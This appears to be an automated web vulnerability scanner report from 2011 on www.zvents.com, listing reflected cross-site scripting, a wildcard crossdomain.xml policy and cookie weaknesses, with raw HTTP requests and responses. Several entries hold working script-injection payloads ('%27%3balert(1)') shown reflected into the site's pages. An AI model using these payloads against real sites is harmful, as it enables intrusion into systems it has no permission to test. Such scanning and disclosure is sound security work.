2. Cross-site scripting (reflected)
2.1. http://www.zvents.com/z/dallas-tx/theater_arts [REST URL parameter 3]
2.2. http://www.zvents.com/z/metrics/document-ready [REST URL parameter 3]
2.3. http://www.zvents.com/z/stylesheets/layout.css [REST URL parameter 3]
2.4. http://www.zvents.com/z/stylesheets/uex.css [REST URL parameter 3]
4. Cookie scoped to parent domain
5. Cross-domain Referer leakage
6. Cross-domain script include
6.1. http://www.zvents.com/z/dallas-tx
6.2. http://www.zvents.com/z/dallas-tx/theater_arts
6.3. http://www.zvents.com/z/javascripts/head.js
7. Cookie without HttpOnly flag set
7.2. http://www.zvents.com/z/dallas-tx
7.3. http://www.zvents.com/zat
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /zat |
GET /zat?r=&url=http%3A%2F Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1309792431195%26vn |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:33:52 GMT Content-Type: image/gif Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: welcome=a27dd 7416f347a3f;Path=/;Domain=zvents.com Content-Length: 42 GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/dallas-tx/theater_arts |
GET /z/dallas-tx/theater_artse110e%2527%253balert Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:37:57 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT ETag: "1898a01c69ed53be2c4 X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:37:56 GMT Set-Cookie: user_location=dallas-tx; path=/ Set-Cookie: _uex_web_session X-Runtime: 0.911664 Content-Length: 36484 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... 'undefined') { for(var name in site_catalyst_extras) { s_zv[name] = site_catalyst_extras[name } } s_zv.prop41='not logged in'; s_zv.prop49='art_ZEN'; s_zv.prop12='searches'; s_zv.prop1='theater_artse110e';alert(1)/ s_zv.prop2=''; s_zv.prop3='this year'; s_zv.prop4='50'; s_zv.prop5='0'; s_zv.prop6='any'; s_zv.prop7='0'; s_zv.prop8='new'; s_zv.prop9=''; s_zv.prop11='theater ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/metrics/document-ready |
GET /z/metrics/document-ready92558%2527%253balert Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:33:55 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT ETag: "b9b42ace910f61dce4b X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:33:54 GMT Set-Cookie: user_location=meterik Set-Cookie: _uex_web_session X-Runtime: 1.308406 Content-Length: 32384 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... undefined') { for(var name in site_catalyst_extras) { s_zv[name] = site_catalyst_extras[name } } s_zv.prop41='not logged in'; s_zv.prop49='art_ZEN'; s_zv.prop12='searches'; s_zv.prop1='document s_zv.prop2=''; s_zv.prop3='this year'; s_zv.prop4='50'; s_zv.prop5='0'; s_zv.prop6='any'; s_zv.prop7='0'; s_zv.prop8='new'; s_zv.prop9=''; s_zv.prop11='document ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/stylesheets/layout.css |
GET /z/stylesheets/d7240%2527%253balert Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:33:02 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT ETag: "7dee26326011ee0a31b X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:33:01 GMT Set-Cookie: user_location=dallas-tx; path=/ Set-Cookie: _uex_web_session X-Runtime: 0.977197 Content-Length: 36431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... st_extras != 'undefined') { for(var name in site_catalyst_extras) { s_zv[name] = site_catalyst_extras[name } } s_zv.prop41='not logged in'; s_zv.prop49='art_ZEN'; s_zv.prop12='searches'; s_zv.prop1='d7240';alert(1)/ s_zv.prop2=''; s_zv.prop3='this year'; s_zv.prop4='50'; s_zv.prop5='0'; s_zv.prop6='any'; s_zv.prop7='0'; s_zv.prop8='new'; s_zv.prop9=''; s_zv.prop11='d7240';alert s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/stylesheets/uex.css |
GET /z/stylesheets/9609f%2527%253balert Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:33:13 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT ETag: "d67ca09e99d8317a2cc X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:33:12 GMT Set-Cookie: user_location=dallas-tx; path=/ Set-Cookie: _uex_web_session X-Runtime: 1.192210 Content-Length: 36431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... st_extras != 'undefined') { for(var name in site_catalyst_extras) { s_zv[name] = site_catalyst_extras[name } } s_zv.prop41='not logged in'; s_zv.prop49='art_ZEN'; s_zv.prop12='searches'; s_zv.prop1='9609f';alert(1)/ s_zv.prop2=''; s_zv.prop3='this year'; s_zv.prop4='50'; s_zv.prop5='0'; s_zv.prop6='any'; s_zv.prop7='0'; s_zv.prop8='new'; s_zv.prop9=''; s_zv.prop11='9609f';alert s ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zvents.com |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:45 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Wed, 13 Feb 2008 03:19:32 GMT Connection: keep-alive Expires: Sun, 05 Jun 2011 15:31:45 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /zat |
GET /zat?r=&url=http%3A%2F Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1309792431195%26vn |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:32:06 GMT Content-Type: image/gif Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: welcome=17emJAVAmFkj Content-Length: 42 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/javascripts/head.js |
GET /z/javascripts/head.js Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:45 GMT Content-Type: application/x-javascript Last-Modified: Tue, 31 May 2011 18:31:44 GMT Connection: keep-alive Expires: Sun, 05 Jun 2011 15:31:45 GMT Cache-Control: max-age=86400 Content-Length: 106541 if (typeof Zvents == "undefined") { Zvents = {}; } if (typeof ZventsNew == "undefined") { ZventsNew = {}; } if (typeof ZWidgets == "undefined") { ZWidgets = {}; } if (typeof $ZJQuery == "u ...[SNIP]... </script>', '<script type="text/javascript" src="http://edge ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/dallas-tx |
GET /z/dallas-tx HTTP/1.1 Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid If-None-Match: "8cd156f59adde2690e0 |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:44 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "fd8942031b2ce6d45e0 Cache-Control: max-age=0, private, must-revalidate X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:31:44 GMT Set-Cookie: _uex_web_session X-Runtime: 0.300303 Content-Length: 82081 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... </script> <script src="http://partner <script src="http://ajax ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </div> <script src='http://edge ...[SNIP]... </div> <script src="http://maps.google <script src="https://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/dallas-tx/theater_arts |
GET /z/dallas-tx/theater_arts HTTP/1.1 Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:35:47 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT ETag: "7dad5445e991e3dd4d9 X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:35:46 GMT Set-Cookie: _uex_web_session X-Runtime: 0.254811 Content-Length: 68063 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... </script> <script src="http://partner <script src="http://ajax ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... <div class='ad_comp'> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </script> <script type='text/javascript' src='http://partner </script> ...[SNIP]... </div> <script src='http://edge ...[SNIP]... </div> <script src="http://maps.google <script src="https://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/javascripts/head.js |
GET /z/javascripts/head.js Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:45 GMT Content-Type: application/x-javascript Last-Modified: Tue, 31 May 2011 18:31:44 GMT Connection: keep-alive Expires: Sun, 05 Jun 2011 15:31:45 GMT Cache-Control: max-age=86400 Content-Length: 106541 if (typeof Zvents == "undefined") { Zvents = {}; } if (typeof ZventsNew == "undefined") { ZventsNew = {}; } if (typeof ZWidgets == "undefined") { ZWidgets = {}; } if (typeof $ZJQuery == "u ...[SNIP]... </script>', '<script type="text/javascript" src="http://edge ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | / |
GET / HTTP/1.1 Host: www.zvents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1309792431195%26vn |
HTTP/1.1 301 Moved Permanently Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:58 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 173.193.214.243 Location: http://www.zvents.com/z X-Runtime: 16 Cache-Control: no-cache, private Set-Cookie: flavor=new; path=/; expires=Sat, 04-Jun-2016 15:31:58 GMT Set-Cookie: came_from_classic Set-Cookie: _zsess=BAh7BzoPc2Vzc Content-Length: 99 <html><body>You are being <a href="http://www.zvents |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/dallas-tx |
GET /z/dallas-tx HTTP/1.1 Host: www.zvents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid If-None-Match: "81ceb91c594201cc47a |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:32:00 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "c93055977ac2827cf33 Cache-Control: max-age=0, private, must-revalidate X-UA-Compatible: IE=Edge,chrome=1 Set-Cookie: flavor=new; path=/; expires=Wed, 04-Jun-2031 15:31:59 GMT Set-Cookie: user_location=dallas-tx; path=/ Set-Cookie: _uex_web_session X-Runtime: 0.322602 Content-Length: 82081 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns:fb='http://www < ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /zat |
GET /zat?r=&url=http%3A%2F Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1309792431195%26vn |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:32:06 GMT Content-Type: image/gif Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: welcome=17emJAVAmFkj Content-Length: 42 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/javascripts/s_code.js |
GET /z/javascripts/s_code.js Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://www.zvents.com/z User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: zvents_tracker_sid |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:45 GMT Content-Type: application/x-javascript Last-Modified: Tue, 12 Apr 2011 21:03:11 GMT Connection: keep-alive Expires: Sun, 05 Jun 2011 15:31:45 GMT Cache-Control: max-age=86400 Content-Length: 39353 /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ P ...[SNIP]... 7=s.mr($C,(vt@tt`Zvt)`fs +"`Rm('t')`5s.p_r)s.p_r( +";s.`Q`r=n;s.t($3}`5pg){ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /z/stylesheets/layout.css |
GET /robots.txt HTTP/1.0 Host: www.zvents.com |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 04 Jun 2011 15:31:45 GMT Content-Type: text/plain; charset=utf-8 Connection: keep-alive X-Rack-Cache: miss X-Runtime: 4 ETag: "43a325d9ba9f2deac26 Cache-Control: must-revalidate, private, max-age=0 Content-Length: 546 Set-Cookie: _zsess=BAh7BzoPc2Vzc User-agent: * Disallow: /javascripts Disallow: /rss Disallow: /rss* Disallow: /ical Disallow: /ical* Disallow: /json Disallow: /json* Disallow: /partners Disallow: /partners* Disallow: /user/ Disallow ...[SNIP]... |